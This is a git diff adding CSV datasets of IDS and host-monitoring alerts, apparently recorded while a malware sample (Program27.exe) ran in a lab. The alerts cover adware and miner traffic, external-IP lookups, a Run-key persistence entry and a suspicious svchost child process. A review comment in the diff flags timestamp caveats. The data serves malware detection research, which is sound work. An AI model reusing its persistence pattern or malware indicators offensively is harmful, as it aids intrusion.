+"May 30, 2020 @ 13:47:11.457","05/30/2020-13:47:03.276983 [**] [1:2828705:3] ETPRO POLICY IP Check Domain (iplogger .org in DNS Lookup) [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {UDP} 172.16.2.2:64376 -> 172.16.2.1:53","/var/log/suricata/fast.log"
+"May 30, 2020 @ 13:47:11.457","05/30/2020-13:47:03.476449 [**] [1:2837243:2] ETPRO ADWARE_PUP Win32/OxyPumper Adware Related User-Agent Observed [**] [Classification: Possibly Unwanted Program Detected] [Priority: 2] {TCP} 172.16.2.2:49974 -> 88.99.66.31:80","/var/log/suricata/fast.log"
+"May 30, 2020 @ 13:47:11.457","05/30/2020-13:47:03.527234 [**] [1:2828706:3] ETPRO POLICY IP Check Domain (iplogger .org in TLS SNI) [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 172.16.2.2:49975 -> 88.99.66.31:443","/var/log/suricata/fast.log"
+"May 30, 2020 @ 13:47:11.457","05/30/2020-13:47:03.527691 [**] [1:2832295:1] ETPRO POLICY Possible External IP 
Lookup SSL Cert Observed (iplogger .com) [**] [Classification: Device Retrieving External IP Address Detected] [Priority: 2] {TCP} 88.99.66.31:443 -> 172.16.2.2:49975","/var/log/suricata/fast.log"
+"May 30, 2020 @ 13:47:11.457","05/30/2020-13:47:05.102058 [**] [1:2022082:3] ET POLICY External IP Lookup ip-api.com [**] [Classification: Device Retrieving External IP Address Detected] [Priority: 2] {TCP} 172.16.2.2:49978 -> 208.95.112.1:80","/var/log/suricata/fast.log"
+"May 30, 2020 @ 13:47:11.457","05/30/2020-13:47:05.102058 [**] [1:2837243:2] ETPRO ADWARE_PUP Win32/OxyPumper Adware Related User-Agent Observed [**] [Classification: Possibly Unwanted Program Detected] [Priority: 2] {TCP} 172.16.2.2:49978 -> 208.95.112.1:80","/var/log/suricata/fast.log"
+"May 30, 2020 @ 13:47:11.457","05/30/2020-13:47:05.215555 [**] [1:2833087:2] ETPRO MALWARE Win32/QwertMiner Suspicious UA (jdlnb) [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:49979 -> 172.217.16.196:80","/var/log/suricata/fast.log"
+"May 30, 2020 @ 13:47:11.457","05/30/2020-13:47:05.215555 [**] [1:2837242:2] ETPRO ADWARE_PUP Win32/OxyPumper Adware Related Header Observed [**] [Classification: Possibly Unwanted Program Detected] [Priority: 2] {TCP} 172.16.2.2:49979 -> 172.217.16.196:80","/var/log/suricata/fast.log"
+"May 30, 2020 @ 13:47:11.457","05/30/2020-13:47:05.494643 [**] [1:2837243:2] ETPRO ADWARE_PUP Win32/OxyPumper Adware Related User-Agent Observed [**] [Classification: Possibly Unwanted Program Detected] [Priority: 2] {TCP} 172.16.2.2:49980 -> 13.90.173.206:80","/var/log/suricata/fast.log"
diff --git a/data/MW_27_HIDS_3.csv b/data/MW_27_HIDS_3.csv
new file mode 100644
index 0000000..23dd160
--- /dev/null
+++ b/data/MW_27_HIDS_3.csv
@@ -0,0 +1,102 @@
+timestamp,"rule.level","rule.description","data.win.system.message","data.win.eventdata.commandLine","data.win.eventdata.targetObject","full_log","data.win.eventdata.details"
+"May 30, 2020 @ 15:36:32.956",7,"Agent event queue is 90% full.",,,,"wazuh: Agent buffer: '90%'.",
+"May 30, 2020 @ 15:30:06.718",7,"Integrity checksum changed.",,,,"File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Active Setup\Installed Components\{8A69D345-D564-463c-AFF1-A69D9E530F96}' checksum changed.
+Old md5sum was: '7fa7290c3b0e7b2d8ed5a092299db356'
+New md5sum is : '7b0e21ee99623454e8d06871f064ed98'
+Old sha1sum was: '27735fff26a4f9093576dfbd77d06599094d3497'
+New sha1sum is : 'f63735bbc2e72216030f4e994b7c9785856a9170'
+",
+"May 30, 2020 @ 15:27:37.236",7,"Integrity checksum changed.",,,,"File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Active Setup\Installed Components\{8A69D345-D564-463c-AFF1-A69D9E530F96}' checksum changed.
+Old md5sum was: '7b0e21ee99623454e8d06871f064ed98'
+New md5sum is : '7fa7290c3b0e7b2d8ed5a092299db356'
+Old sha1sum was: 'f63735bbc2e72216030f4e994b7c9785856a9170'
+New sha1sum is : '27735fff26a4f9093576dfbd77d06599094d3497'
+",
+"May 30, 2020 @ 15:27:36.227",7,"Integrity checksum changed.",,,,"File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon' checksum changed.
+Old md5sum was: '683769ad6be42008bb88e21c615ecf9d'
+New md5sum is : 'd2abb0e472c53cbf65d10a1f2d09aa79'
+Old sha1sum was: '02d42d90e46269b3dcd90d96a22e0b3108d640cc'
+New sha1sum is : '940d447005e78e8bd3cb6f655847dc7810917403'
+",
+"May 30, 2020 @ 15:27:36.208",7,"Integrity checksum changed.",,,,"File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\VolatileUserMgrKey\1\S-1-5-21-438079597-2123118846-2669748851-1001' checksum changed. 
+Old md5sum was: '541ce0443f4bb6794b91fc8110978c38' +New md5sum is : 'e064d552ab7f45ac175a32c6fadfae16' +Old sha1sum was: '2922dab3a710730ef91616e78115b57f4ec74d4c' +New sha1sum is : '14398c675c8587716a103632fb0302df5f37982d' +", +"May 30, 2020 @ 15:27:33.501",7,"Integrity checksum changed.",,,,"File 'HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run' checksum changed. +Old md5sum was: 'c6d5c466fdaab5a7ef4e81d9e5ef90d2' +New md5sum is : '6491bfbb48f449e8ef2da21bf4925908' +Old sha1sum was: '83bc06dcc92dc45d0223a09e27bb587b1d15d31a' +New sha1sum is : 'a659aa851c1408487eefa829ad359673b7fb1288' +", +"May 30, 2020 @ 15:27:31.251",7,"Integrity checksum changed.",,,,"File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_USE_WINDOWEDSELECTCONTROL' checksum changed. +Old md5sum was: '370914f65a755a1cbfcf0c873b11feaa' +New md5sum is : '1c729912f87f9abbd1574176fc5996f7' +Old sha1sum was: 'ea4c2f8e1a1dc5de73a98dbadb5abff9297c9a4b' +New sha1sum is : '1d2094dc263dc3db258f4421536e179cfbd9cfb0' +", +"May 30, 2020 @ 15:26:26.673",7,"Integrity checksum changed.",,,,"File 'HKEY_LOCAL_MACHINE\Security\Policy\Accounts\S-1-5-32-544\Privilgs' checksum changed. 
+Old md5sum was: 'd2f6f5287a67de5a6a80b2063114c5df' +New md5sum is : 'c14025399795b5c4c7d63168d80274be' +Old sha1sum was: '379cd91990d35c23614e38e9359ba7a6e0774579' +New sha1sum is : '89edceaacf73401446f242269871abebc5f677ca' +", +"May 30, 2020 @ 15:26:24.267",14,"ATT&CK T1036: Suspicious Svchost Process","""Process Create: +RuleName: +UtcTime: 2020-05-30 15:26:21.034 +ProcessGuid: {df9fc3d3-7b1d-5ed2-0000-0010281f0900} +ProcessId: 5224 +Image: C:\Windows\SysWOW64\svchost.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Host Process for Windows Services +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: svchost.exe +CommandLine: svchost.exe +CurrentDirectory: C:\Windows\system32\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-7b04-5ed2-0000-0020576e0300} +LogonId: 0x36E57 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=A7296C1245EE76768D581C6330DADE06,SHA256=5BE0DE7F915BA819D4BA048DB7A2A87F6F3253FDD4865DC418181A0D6A031CAA,IMPHASH=EC10F5BE711CB724C2D4D18A3C10AD6D +ParentProcessGuid: {df9fc3d3-7b1b-5ed2-0000-00106dfa0800} +ParentProcessId: 3996 +ParentImage: C:\Users\John Williams\ccdojkiq.exe +ParentCommandLine: ""C:\Users\John Williams\ccdojkiq.exe"" ""","svchost.exe",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-30T15:26:21.042385000Z"",""eventRecordID"":""2428"",""processID"":""2148"",""threadID"":""3124"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-30 15:26:21.034\r\nProcessGuid: {df9fc3d3-7b1d-5ed2-0000-0010281f0900}\r\nProcessId: 5224\r\nImage: C:\\Windows\\SysWOW64\\svchost.exe\r\nFileVersion: 10.0.18362.1 
(WinBuild.160101.0800)\r\nDescription: Host Process for Windows Services\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: svchost.exe\r\nCommandLine: svchost.exe\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-7b04-5ed2-0000-0020576e0300}\r\nLogonId: 0x36E57\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=A7296C1245EE76768D581C6330DADE06,SHA256=5BE0DE7F915BA819D4BA048DB7A2A87F6F3253FDD4865DC418181A0D6A031CAA,IMPHASH=EC10F5BE711CB724C2D4D18A3C10AD6D\r\nParentProcessGuid: {df9fc3d3-7b1b-5ed2-0000-00106dfa0800}\r\nParentProcessId: 3996\r\nParentImage: C:\\Users\\John Williams\\ccdojkiq.exe\r\nParentCommandLine: \""C:\\Users\\John Williams\\ccdojkiq.exe\"" \""""},""eventdata"":{""utcTime"":""2020-05-30 15:26:21.034"",""processGuid"":""{df9fc3d3-7b1d-5ed2-0000-0010281f0900}"",""processId"":""5224"",""image"":""C:\\\\Windows\\\\SysWOW64\\\\svchost.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Host Process for Windows Services"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""svchost.exe"",""commandLine"":""svchost.exe"",""currentDirectory"":""C:\\\\Windows\\\\system32\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-7b04-5ed2-0000-0020576e0300}"",""logonId"":""0x36e57"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=A7296C1245EE76768D581C6330DADE06,SHA256=5BE0DE7F915BA819D4BA048DB7A2A87F6F3253FDD4865DC418181A0D6A031CAA,IMPHASH=EC10F5BE711CB724C2D4D18A3C10AD6D"",""parentProcessGuid"":""{df9fc3d3-7b1b-5ed2-0000-00106dfa0800}"",""parentProcessId"":""3996"",""parentImage"":""C:\\\\Users\\\\John Williams\\\\ccdojkiq.exe"",""parentCommandLine"":""\\\""C:\\\\Users\\\\John Williams\\\\ccdojkiq.exe\\\""""}}}", +"May 30, 2020 @ 15:26:08.406",9,"Benchmark for Windows audit: Ensure 'MSS: 
(AutoAdminLogon) Enable Automatic Logon (not recommended)' is set to 'Disabled': Status changed from 'not applicable' to failed",,,,, +"May 30, 2020 @ 15:25:58.595",7,"SessionEnv was unavailable to handle a critical notification event","""The winlogon notification subscriber was unavailable to handle a critical notification event.""",,,, +"May 30, 2020 @ 15:25:17.428",9,"Windows Application error event",,,,, +"May 30, 2020 @ 15:20:40.356",14,"ATT&CK T1036: Suspicious Svchost Process","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:25.552 +ProcessGuid: {df9fc3d3-b355-5ecf-0000-001097d21800} +ProcessId: 6264 +Image: C:\Windows\SysWOW64\svchost.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Host Process for Windows Services +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: svchost.exe +CommandLine: svchost.exe +CurrentDirectory: C:\Users\John Williams\Downloads\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=A7296C1245EE76768D581C6330DADE06,SHA256=5BE0DE7F915BA819D4BA048DB7A2A87F6F3253FDD4865DC418181A0D6A031CAA,IMPHASH=EC10F5BE711CB724C2D4D18A3C10AD6D +ParentProcessGuid: {df9fc3d3-b354-5ecf-0000-0010a2c71800} +ParentProcessId: 256 +ParentImage: C:\Users\John Williams\ccdojkiq.exe +ParentCommandLine: ""C:\Users\John Williams\ccdojkiq.exe"" /d""C:\Users\John Williams\Downloads\Program27.exe"" 
/e5503021000000542""","svchost.exe",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:25.555657400Z"",""eventRecordID"":""2003"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:25.552\r\nProcessGuid: {df9fc3d3-b355-5ecf-0000-001097d21800}\r\nProcessId: 6264\r\nImage: C:\\Windows\\SysWOW64\\svchost.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Host Process for Windows Services\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: svchost.exe\r\nCommandLine: svchost.exe\r\nCurrentDirectory: C:\\Users\\John Williams\\Downloads\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=A7296C1245EE76768D581C6330DADE06,SHA256=5BE0DE7F915BA819D4BA048DB7A2A87F6F3253FDD4865DC418181A0D6A031CAA,IMPHASH=EC10F5BE711CB724C2D4D18A3C10AD6D\r\nParentProcessGuid: {df9fc3d3-b354-5ecf-0000-0010a2c71800}\r\nParentProcessId: 256\r\nParentImage: C:\\Users\\John Williams\\ccdojkiq.exe\r\nParentCommandLine: \""C:\\Users\\John Williams\\ccdojkiq.exe\"" /d\""C:\\Users\\John Williams\\Downloads\\Program27.exe\"" /e5503021000000542\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:25.552"",""processGuid"":""{df9fc3d3-b355-5ecf-0000-001097d21800}"",""processId"":""6264"",""image"":""C:\\\\Windows\\\\SysWOW64\\\\svchost.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Host Process for Windows Services"",""product"":""Microsoft® Windows® Operating 
System"",""company"":""Microsoft Corporation"",""originalFileName"":""svchost.exe"",""commandLine"":""svchost.exe"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=A7296C1245EE76768D581C6330DADE06,SHA256=5BE0DE7F915BA819D4BA048DB7A2A87F6F3253FDD4865DC418181A0D6A031CAA,IMPHASH=EC10F5BE711CB724C2D4D18A3C10AD6D"",""parentProcessGuid"":""{df9fc3d3-b354-5ecf-0000-0010a2c71800}"",""parentProcessId"":""256"",""parentImage"":""C:\\\\Users\\\\John Williams\\\\ccdojkiq.exe"",""parentCommandLine"":""\\\""C:\\\\Users\\\\John Williams\\\\ccdojkiq.exe\\\"" /d\\\""C:\\\\Users\\\\John Williams\\\\Downloads\\\\Program27.exe\\\"" /e5503021000000542""}}}", +"May 30, 2020 @ 15:20:40.232",14,"ATT&CK T1060: Suspicious RUN Key from Download","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-28 12:49:24.759 +ProcessGuid: {df9fc3d3-b353-5ecf-0000-0010b8a01800} +ProcessId: 6208 +Image: C:\Users\John Williams\Downloads\Program27.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\mxyxziig +Details: ""C:\Users\John Williams\ccdojkiq.exe""""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\mxyxziig","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:24.766137000Z"",""eventRecordID"":""1998"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value 
set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-28 12:49:24.759\r\nProcessGuid: {df9fc3d3-b353-5ecf-0000-0010b8a01800}\r\nProcessId: 6208\r\nImage: C:\\Users\\John Williams\\Downloads\\Program27.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\mxyxziig\r\nDetails: \""C:\\Users\\John Williams\\ccdojkiq.exe\""\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-28 12:49:24.759"",""processGuid"":""{df9fc3d3-b353-5ecf-0000-0010b8a01800}"",""processId"":""6208"",""image"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\Program27.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\mxyxziig"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\ccdojkiq.exe\\\""""}}}","\""C:\\Users\\John Williams\\ccdojkiq.exe\""" diff --git a/data/MW_27_NIDS.csv b/data/MW_27_NIDS.csv new file mode 100644 index 0000000..1082e0f --- /dev/null +++ b/data/MW_27_NIDS.csv 
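Review bot: The `timestamp` column of this export appears to be the ingest/index time rather than the event time: the T1060 row and the second T1036 row at the end of the hunk carry `UtcTime: 2020-05-28 12:49` inside `data.win.system.message` and `data.win.eventdata.utcTime`, while their `timestamp` is `May 30, 2020 @ 15:20:40`, two days later, so aligning HIDS rows with the NIDS `@timestamp` column by time alone will mis-correlate these detections. The first row (`Agent event queue is 90% full.`) also shows the agent buffer close to saturation during the run, so this file may not be a complete record of host events for the sample. Both caveats belong beside the column descriptions in the dataset's overview or README, for example `timestamp is the Wazuh/Kibana index time; use data.win.eventdata.utcTime for the event time` together with a note that an agent-buffer warning was recorded for this sample. The `full_log` and message fields contain embedded newlines and doubled quotes, so the README should also state that consumers need a quote-aware (RFC 4180) CSV parser rather than line-based splitting.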
@@ -0,0 +1,87 @@
+"@timestamp",message,"log.file.path"
+"May 30, 2020 @ 15:42:52.321","05/30/2020-15:42:42.345854 [**] [1:2024792:4] ET POLICY Cryptocurrency Miner Checkin [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 172.16.2.2:50911 -> 83.151.238.37:8080","/var/log/suricata/fast.log"
+"May 30, 2020 @ 15:42:52.321","05/30-15:42:42.345854 [**] [1:2024792:4] ET POLICY Cryptocurrency Miner Checkin [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 172.16.2.2:50911 -> 83.151.238.37:8080","/var/log/snort/alert.fast"
+"May 30, 2020 @ 15:30:18.508","05/30-15:30:10.472068 [**] [1:2026743:2] ET POLICY Observed Suspicious SSL Cert (External IP Lookup - ident .me) [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 176.58.123.25:443 -> 172.16.2.2:49847","/var/log/snort/alert.fast"
+"May 30, 2020 @ 15:30:11.415","05/30/2020-15:30:10.735915 [**] [1:2026743:3] ET HUNTING Observed Suspicious SSL Cert (External IP Lookup - ident .me) [**] [Classification: Device Retrieving External IP Address Detected] [Priority: 2] {TCP} 176.58.123.25:443 -> 172.16.2.2:49847","/var/log/suricata/fast.log"
+"May 30, 2020 @ 15:29:56.400","05/30/2020-15:29:49.941742 [**] [1:2028794:2] ET JA3 Hash - [Abuse.ch] Possible Tofsee [**] [Classification: Unknown Traffic] [Priority: 3] {TCP} 172.16.2.2:49830 -> 216.239.38.21:443","/var/log/suricata/fast.log"
+"May 30, 2020 @ 15:29:56.400","05/30/2020-15:29:49.942032 [**] [1:2025330:3] ET POLICY Possible External IP Lookup SSL Cert Observed (ipinfo.io) [**] [Classification: Device Retrieving External IP Address Detected] [Priority: 2] {TCP} 216.239.38.21:443 -> 172.16.2.2:49830","/var/log/suricata/fast.log"
+"May 30, 2020 @ 15:29:56.399","05/30/2020-15:29:49.941742 [**] [1:2025331:3] ET POLICY Possible External IP Lookup Domain Observed in SNI (ipinfo. 
io) [**] [Classification: Device Retrieving External IP Address Detected] [Priority: 2] {TCP} 172.16.2.2:49830 -> 216.239.38.21:443","/var/log/suricata/fast.log" +"May 30, 2020 @ 15:29:53.491","05/30-15:29:49.925547 [**] [1:2025331:3] ET POLICY Possible External IP Lookup Domain Observed in SNI (ipinfo. io) [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:49830 -> 216.239.38.21:443","/var/log/snort/alert.fast" +"May 30, 2020 @ 15:29:38.487","05/30-15:29:31.033776 [**] [1:2816531:3] ETPRO POLICY External IP Lookup www.trackip.net [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 172.16.2.2:49798 -> 104.28.8.113:80","/var/log/snort/alert.fast" +"May 30, 2020 @ 15:29:31.386","05/30/2020-15:29:31.194422 [**] [1:2816531:4] ETPRO POLICY External IP Lookup www.trackip.net [**] [Classification: Device Retrieving External IP Address Detected] [Priority: 2] {TCP} 172.16.2.2:49798 -> 104.28.8.113:80","/var/log/suricata/fast.log" +"May 30, 2020 @ 15:29:24.383","05/30/2020-15:29:22.356977 [**] [1:2805815:6] ETPRO POLICY IP Check Domain (whatismyipaddress .com in HTTP Host) [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 172.16.2.2:49791 -> 66.171.248.178:80","/var/log/suricata/fast.log" +"May 30, 2020 @ 15:29:23.477","05/30-15:29:22.197701 [**] [1:2805815:3] ETPRO POLICY IP Check Domain (whatismyipaddress .com in HTTP Host) [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 172.16.2.2:49791 -> 66.171.248.178:80","/var/log/snort/alert.fast" +"May 30, 2020 @ 15:28:39.314","05/30/2020-15:28:35.054370 [**] [1:2021997:3] ET POLICY External IP Lookup api.ipify.org [**] [Classification: Device Retrieving External IP Address Detected] [Priority: 2] {TCP} 172.16.2.2:49748 -> 184.73.165.106:80","/var/log/suricata/fast.log" +"May 30, 2020 @ 15:28:39.314","05/30/2020-15:28:35.524656 [**] [1:2816531:4] ETPRO POLICY External IP Lookup www.trackip.net [**] 
[Classification: Device Retrieving External IP Address Detected] [Priority: 2] {TCP} 172.16.2.2:49749 -> 104.28.8.113:80","/var/log/suricata/fast.log" +"May 30, 2020 @ 15:28:38.447","05/30-15:28:34.812354 [**] [1:2021997:1] ET POLICY External IP Lookup api.ipify.org [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 172.16.2.2:49748 -> 184.73.165.106:80","/var/log/snort/alert.fast" +"May 30, 2020 @ 15:28:38.447","05/30-15:28:35.354784 [**] [1:2816531:3] ETPRO POLICY External IP Lookup www.trackip.net [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 172.16.2.2:49749 -> 104.28.8.113:80","/var/log/snort/alert.fast" +"May 30, 2020 @ 15:27:19.287","05/30/2020-15:27:17.870873 [**] [1:2021997:3] ET POLICY External IP Lookup api.ipify.org [**] [Classification: Device Retrieving External IP Address Detected] [Priority: 2] {TCP} 172.16.2.2:49718 -> 23.21.59.179:80","/var/log/suricata/fast.log" +"May 30, 2020 @ 15:27:18.429","05/30-15:27:11.649345 [**] [1:2025331:3] ET POLICY Possible External IP Lookup Domain Observed in SNI (ipinfo. 
io) [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:49715 -> 216.239.32.21:443","/var/log/snort/alert.fast" +"May 30, 2020 @ 15:27:18.429","05/30-15:27:11.904282 [**] [1:2805815:3] ETPRO POLICY IP Check Domain (whatismyipaddress .com in HTTP Host) [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 172.16.2.2:49714 -> 66.171.248.178:80","/var/log/snort/alert.fast" +"May 30, 2020 @ 15:27:18.429","05/30-15:27:17.714317 [**] [1:2021997:1] ET POLICY External IP Lookup api.ipify.org [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 172.16.2.2:49718 -> 23.21.59.179:80","/var/log/snort/alert.fast" +"May 30, 2020 @ 15:27:16.285","05/30/2020-15:27:15.116649 [**] [1:2805815:6] ETPRO POLICY IP Check Domain (whatismyipaddress .com in HTTP Host) [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 172.16.2.2:49714 -> 66.171.248.178:80","/var/log/suricata/fast.log" +"May 30, 2020 @ 15:27:13.283","05/30/2020-15:27:11.713087 [**] [1:2025331:3] ET POLICY Possible External IP Lookup Domain Observed in SNI (ipinfo. 
io) [**] [Classification: Device Retrieving External IP Address Detected] [Priority: 2] {TCP} 172.16.2.2:49715 -> 216.239.32.21:443","/var/log/suricata/fast.log" +"May 30, 2020 @ 15:27:13.283","05/30/2020-15:27:11.713087 [**] [1:2028794:2] ET JA3 Hash - [Abuse.ch] Possible Tofsee [**] [Classification: Unknown Traffic] [Priority: 3] {TCP} 172.16.2.2:49715 -> 216.239.32.21:443","/var/log/suricata/fast.log" +"May 30, 2020 @ 15:27:13.283","05/30/2020-15:27:12.203164 [**] [1:2025330:3] ET POLICY Possible External IP Lookup SSL Cert Observed (ipinfo.io) [**] [Classification: Device Retrieving External IP Address Detected] [Priority: 2] {TCP} 216.239.32.21:443 -> 172.16.2.2:49715","/var/log/suricata/fast.log" +"May 30, 2020 @ 15:27:06.280","05/30/2020-15:27:02.337637 [**] [1:2021378:4] ET POLICY External IP Lookup - checkip.dyndns.org [**] [Classification: Device Retrieving External IP Address Detected] [Priority: 2] {TCP} 172.16.2.2:49713 -> 162.88.193.70:80","/var/log/suricata/fast.log" +"May 30, 2020 @ 15:27:06.280","05/30/2020-15:27:03.377473 [**] [1:2014932:2] ET POLICY DynDNS CheckIp External IP Address Server Response [**] [Classification: Device Retrieving External IP Address Detected] [Priority: 2] {TCP} 162.88.193.70:80 -> 172.16.2.2:49713","/var/log/suricata/fast.log" +"May 30, 2020 @ 15:27:03.426","05/30-15:27:02.241052 [**] [1:2021378:1] ET POLICY External IP Lookup - checkip.dyndns.org [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 172.16.2.2:49713 -> 162.88.193.70:80","/var/log/snort/alert.fast" +"May 30, 2020 @ 15:27:03.426","05/30-15:27:02.337246 [**] [1:2014932:1] ET POLICY DynDNS CheckIp External IP Address Server Response [**] [Classification: Potentially Bad Traffic] [Priority: 2] {TCP} 162.88.193.70:80 -> 172.16.2.2:49713","/var/log/snort/alert.fast" +"May 30, 2020 @ 15:27:00.425","05/30-15:26:56.019479 [**] [1:2024792:4] ET POLICY Cryptocurrency Miner Checkin [**] [Classification: Potential Corporate Privacy 
Violation] [Priority: 1] {TCP} 172.16.2.2:49712 -> 83.151.238.37:8080","/var/log/snort/alert.fast" +"May 30, 2020 @ 15:26:59.279","05/30/2020-15:26:56.019479 [**] [1:2024792:4] ET POLICY Cryptocurrency Miner Checkin [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 172.16.2.2:49712 -> 83.151.238.37:8080","/var/log/suricata/fast.log" +"May 30, 2020 @ 15:26:45.421","05/30-15:26:35.698016 [**] [1:2026743:2] ET POLICY Observed Suspicious SSL Cert (External IP Lookup - ident .me) [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 176.58.123.25:443 -> 172.16.2.2:49709","/var/log/snort/alert.fast" +"May 30, 2020 @ 15:26:44.276","05/30/2020-15:26:35.837593 [**] [1:2026743:3] ET HUNTING Observed Suspicious SSL Cert (External IP Lookup - ident .me) [**] [Classification: Device Retrieving External IP Address Detected] [Priority: 2] {TCP} 176.58.123.25:443 -> 172.16.2.2:49709","/var/log/suricata/fast.log" +"May 30, 2020 @ 15:25:00.399","05/30-15:24:58.643003 [**] [1:2020716:2] ET POLICY Possible External IP Lookup ipinfo.io [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 172.16.2.2:50218 -> 216.239.38.21:80","/var/log/snort/alert.fast" +"May 30, 2020 @ 15:24:59.242","05/30/2020-15:24:58.914084 [**] [1:2020716:5] ET POLICY Possible External IP Lookup ipinfo.io [**] [Classification: Device Retrieving External IP Address Detected] [Priority: 2] {TCP} 172.16.2.2:50218 -> 216.239.38.21:80","/var/log/suricata/fast.log" +"May 30, 2020 @ 15:24:58.241","05/30/2020-15:24:56.556075 [**] [1:2832022:2] ETPRO HUNTING Observed Suspicious SSL Cert 